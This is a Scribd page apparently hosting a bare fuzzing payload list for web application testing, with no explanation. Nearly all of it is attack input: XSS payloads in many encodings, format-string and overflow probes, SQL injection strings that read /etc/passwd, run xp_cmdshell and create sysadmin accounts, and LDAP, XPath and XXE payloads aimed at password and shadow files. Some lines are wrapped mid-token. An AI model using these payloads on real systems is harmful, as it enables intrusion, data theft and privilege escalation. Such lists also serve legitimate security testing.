Scribd Logo
Upload

Welcome to Scribd!

  • Dlis

    Uploaded by

    Anonymous R7a3n0mg
    7 views4 pages
    dfgdfg

    Original Title

    dlis

    Copyright

    © © All Rights Reserved

    Available Formats

    TXT, PDF, TXT or read online from Scribd

    Did you find this document useful?

    Is this content inappropriate?

    Report this Document
    dfgdfg

    Copyright:

    © All Rights Reserved
    Download as TXT, PDF, TXT or read online from Scribd
    Flag for inappropriate content
    7 views4 pages

    Dlis

    Uploaded by

    Anonymous R7a3n0mg
    dfgdfg

    Copyright:

    © All Rights Reserved
    Download as TXT, PDF, TXT or read online from Scribd
    Flag for inappropriate content
    of 4

    >"><script>alert("XSS")</script>&

    '';!--"<XSS>=&{()}
    >"><script>alert("XSS")</script>&
    "><STYLE>@import"javascript:alert('XSS')";</STYLE>
    >"'><img%20src%3D%26%23x6a;%26%23x61;%26%23x76;%26%23x61;%26%23x73;%26%23x63;%26
    %23x72;%26%23x69;%26%23x70;%26%23x74;%26%23x3a;
    alert(%26quot;%26%23x20;XSS%26%23x20;Test%26%23x20;Successful%26quot;)>
    >%22%27><img%20src%3d%22javascript:alert(%27%20XSS%27)%22>
    '%uff1cscript%uff1ealert('XSS')%uff1c/script%uff1e'
    ">
    >"
    '';!--"<XSS>=&{()}
    <IMG SRC="javascript:alert('XSS');">
    <IMG SRC=javascript:alert('XSS')>
    <IMG SRC=JaVaScRiPt:alert('XSS')>
    <IMG SRC=JaVaScRiPt:alert(&quot;XSS<WBR>&quot;)>
    <IMGSRC=&#106;&#97;&#118;&#97;&<WBR>#115;&#99;&#114;&#105;&#112;&<WBR>#116;&#58;
    &#97;
    &#108;&#101;&<WBR>#114;&#116;&#40;&#39;&#88;&#83<WBR>;&#83;&#39;&#41>
    <IMGSRC=&#0000106&#0000097&<WBR>#0000118&#0000097&#0000115&<WBR>#0000099&#000011
    4&#0000105&<WBR>#0000112&#0000116&#0000058
    &<WBR>#0000097&#0000108&#0000101&<WBR>#0000114&#0000116&#0000040&<WBR>#0000039&#
    0000088&#0000083&<WBR>#0000083&#0000039&#0000041>
    <IMGSRC=&#x6A&#x61&#x76&#x61&#x73&<WBR>#x63&#x72&#x69&#x70&#x74&#x3A&<WBR>#x61&#
    x6C&#x65&#x72&#x74&#x28
    &<WBR>#x27&#x58&#x53&#x53&#x27&#x29>
    <IMG SRC="jav&#x09;ascript:alert(<WBR>'XSS');">
    <IMG SRC="jav&#x0A;ascript:alert(<WBR>'XSS');">
    <IMG SRC="jav&#x0D;ascript:alert(<WBR>'XSS');">
    A x 5
    A x 17
    A x 33
    A x 65
    A x 129
    A x 257
    A x 513
    A x 1024
    A x 2049
    A x 4097
    A x 8193
    A x 12288
    %s%p%x%d
    .1024d
    %.2049d
    %p%p%p%p
    %x%x%x%x
    %d%d%d%d
    %s%s%s%s
    %99999999999s
    %08x
    %%20d
    %%20n
    %%20x
    %%20s
    %s%s%s%s%s%s%s%s%s%s
    %p%p%p%p%p%p%p%p%p%p
    %#0123456x%08x%x%s%p%d%n%o%u%c%h%l%q%j%z%Z%t%i%e%g%f%a%C%S%08x%%
    %s x 129
    %x x 257
    -1

    0
    0x100
    0x1000
    0x3fffffff
    0x7ffffffe
    0x7fffffff
    0x80000000
    0xfffffffe
    0xffffffff
    0x10000
    0x100000
    '||(elt(-3+5,bin(15),ord(10),hex(char(45))))
    ||6
    '||'6
    (||6)
    ' OR 1=1-OR 1=1
    ' OR '1'='1
    ; OR '1'='1'
    %22+or+isnull%281%2F0%29+%2F*
    %27+OR+%277659%27%3D%277659
    %22+or+isnull%281%2F0%29+%2F*
    %27+--+
    ' or 1=1-" or 1=1-' or 1=1 /*
    or 1=1-' or 'a'='a
    " or "a"="a
    ') or ('a'='a
    Admin' OR '
    '%20SELECT%20*%20FROM%20INFORMATION_SCHEMA.TABLES-) UNION SELECT%20*%20FROM%20INFORMATION_SCHEMA.TABLES;
    ' having 1=1-' having 1=1-' group by userid having 1=1-' SELECT name FROM syscolumns WHERE id = (SELECT id FROM sysobjects WHERE name =
    tablename')-' or 1 in (select @@version)-' union all select @@version-' OR 'unusual' = 'unusual'
    ' OR 'something' = 'some'+'thing'
    ' OR 'text' = N'text'
    ' OR 'something' like 'some%'
    ' OR 2 > 1
    ' OR 'text' > 't'
    ' OR 'whatever' in ('whatever')
    ' OR 2 BETWEEN 1 and 3
    ' or username like char(37);
    ' union select * from users where login = char(114,111,111,116);
    ' union select
    Password:*/=1-UNI/**/ON SEL/**/ECT
    '; EXECUTE IMMEDIATE 'SEL' || 'ECT US' || 'ER'
    '; EXEC ('SEL' + 'ECT US' + 'ER')
    '/**/OR/**/1/**/=/**/1
    ' or 1/*
    +or+isnull%281%2F0%29+%2F*
    %27+OR+%277659%27%3D%277659
    %22+or+isnull%281%2F0%29+%2F*

    %27+--+&password=
    '; begin declare @var varchar(8000) set @var=':' select @var=@var+'+login+'/'+pa
    ssword+' ' from users where login >
    @var select @var as var into temp end -' and 1 in (select var from temp)-' union select 1,load_file('/etc/passwd'),1,1,1;
    1;(load_file(char(47,101,116,99,47,112,97,115,115,119,100))),1,1,1;
    ' and 1=( if((load_file(char(110,46,101,120,116))<>char(39,39)),1,0));
    '; exec master..xp_cmdshell 'ping 10.10.1.2'-CREATE USER name IDENTIFIED BY 'pass123'
    CREATE USER name IDENTIFIED BY pass123 TEMPORARY TABLESPACE temp DEFAULT TABLESP
    ACE users;
    ' ; drop table temp -exec sp_addlogin 'name' , 'password'
    exec sp_addsrvrolemember 'name' , 'sysadmin'
    INSERT INTO mysql.user (user, host, password) VALUES ('name', 'localhost', PASSW
    ORD('pass123'))
    GRANT CONNECT TO name; GRANT RESOURCE TO name;
    INSERT INTO Users(Login, Password, Level) VALUES( char(0x70) + char(0x65) + char
    (0x74) + char(0x65) + char(0x72) + char(0x70)
    + char(0x65) + char(0x74) + char(0x65) + char(0x72),char(0x64)
    |
    !
    (
    )
    %28
    %29
    &
    %26
    %21
    %7C
    *|
    %2A%7C
    *(|(mail=*))
    %2A%28%7C%28mail%3D%2A%29%29
    *(|(objectclass=*))
    %2A%28%7C%28objectclass%3D%2A%29%29
    *()|%26'
    admin*
    admin*)((|userPassword=*)
    *)(uid=*))(|(uid=*
    '+or+'1'='1
    '+or+''='
    x'+or+1=1+or+'x'='y
    /
    //
    //*
    */*
    @*
    count(/child::node())
    x'+or+name()='username'+or+'x'='y
    <![CDATA[<script>var n=0;while(true){n++;}</script>]]>
    <?xml version="1.0" encoding="ISO-8859-1"?><foo><![CDATA[<]]>SCRIPT<![CDATA[>]]>
    alert('gotcha');<![CDATA[<]]>/SCRIPT<![CDATA[>]]></foo>
    <?xml version="1.0" encoding="ISO-8859-1"?><foo><![CDATA[' or 1=1 or ''=']]></fo
    of>
    <?xml version="1.0" encoding="ISO-8859-1"?><!DOCTYPE foo [<!ELEMENT foo ANY><!EN
    TITY xxe SYSTEM "file://c:/boot.ini">]><foo>&xee;</foo>
    <?xml version="1.0" encoding="ISO-8859-1"?><!DOCTYPE foo [<!ELEMENT foo ANY><!EN

    TITY xxe SYSTEM "file:///etc/passwd">]><foo>&xee;</foo>


    <?xml version="1.0" encoding="ISO-8859-1"?><!DOCTYPE foo [<!ELEMENT foo ANY><!EN
    TITY xxe SYSTEM "file:///etc/shadow">]><foo>&xee;</foo>
    <?xml version="1.0" encoding="ISO-8859-1"?><!DOCTYPE foo [<!ELEMENT foo ANY><!EN
    TITY xxe SYSTEM "file:///dev/random">]><foo>&xee;</foo>

    You might also like